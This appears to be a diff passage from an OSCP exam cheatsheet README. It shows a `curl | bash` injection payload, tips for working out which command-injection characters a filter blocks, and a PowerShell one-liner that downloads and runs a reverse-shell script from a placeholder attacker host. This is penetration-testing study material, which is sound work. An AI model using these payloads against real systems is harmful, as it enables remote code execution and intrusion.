Desm0ndChan/OSCP-cheatsheet/README.md

 Then on the server side, use `curl http://IP/rev.sh | bash` or similar tool as your injection payload.

+### Command injection payload choices
+Sometimes an application might have firewall or defences in-place, it means some special characters might be blocked.
+Common command injection special characters are `;"|'&$`

+If you found that an application consist of a firewall/defence, try and see which characters are banned and which are not.
+Sometimes it allows `'` but not `"`, vice versa.
+Sometimes it allows `;` but not `|`, vice versa.

 ### Starting a windows conptyshell in background (can use it via a web shell to call conptyshell directly)
 ```cmd
 start /B powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/rev.ps1')"